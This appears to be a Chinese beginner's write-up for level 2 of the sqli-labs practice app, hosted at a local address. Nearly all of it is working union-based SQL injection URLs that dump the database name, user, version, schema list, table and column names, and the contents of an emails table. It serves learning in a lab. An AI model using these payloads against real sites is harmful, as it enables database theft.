第二关来喽!!!
还是老样子,我们先查看后端代码:
可以看到,第二关的变量没有引号限制,当输入:
http://192.168.228.129/sqli-labs-master/Less-2/?id=1 --+
因为和第一关一样,所以第二关也是有3个字段,所以接下来我们直接爆库,同样采用union联合查询:
http://192.168.228.129/sqli-labs-master/Less-2/?id=-1%20union%20select%20NULL,database(),user()%20--+
我们还可以:
http://192.168.228.129/sqli-labs-master/Less-2/?id=-1%20union%20select%20NULL,@@datadir,version()%20--+
我们现在已经知道了数据库名字(security),另外,我们可以尝试来把所有的库名爆出来,如下:
http://192.168.228.129/sqli-labs-master/Less-2/?id=-1%20union%20select%20NULL,group_concat(schema_name),null%20from%20information_schema.schemata%20--+
我们现在把重点主要放在爆破security这个库上,老规矩,爆出库名以后我们开始爆库里面的表:
http://192.168.228.129/sqli-labs-master/Less-2/?id=-1%20union%20select%20NULL,group_concat(table_name),null%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+
我们现在来爆emails表中的字段:
http://192.168.228.129/sqli-labs-master/Less-2/?id=-1%20union%20select%20NULL,group_concat(column_name),null%20from%20information_schema.columns%20where%20table_name=%27emails%27%20--+
email表中有两个字段,然后我们来把这两个字段中的数据爆出来:
http://192.168.228.129/sqli-labs-master/Less-2/?id=-1%20union%20select%20NULL,group_concat(id),group_concat(email_id)%20from%20emails%20--+
接着,我们在数据库中来查看对比数据是否一致:
可以看出,结果是一样的,如果想要爆其他库或者表的内容的话,可以参照上面的语句。
我自己也是刚开始学习安全的小白,以上内容如果有什么问题或者错误,欢迎大家纠正和提意见,大佬们勿喷/(ㄒoㄒ)/~~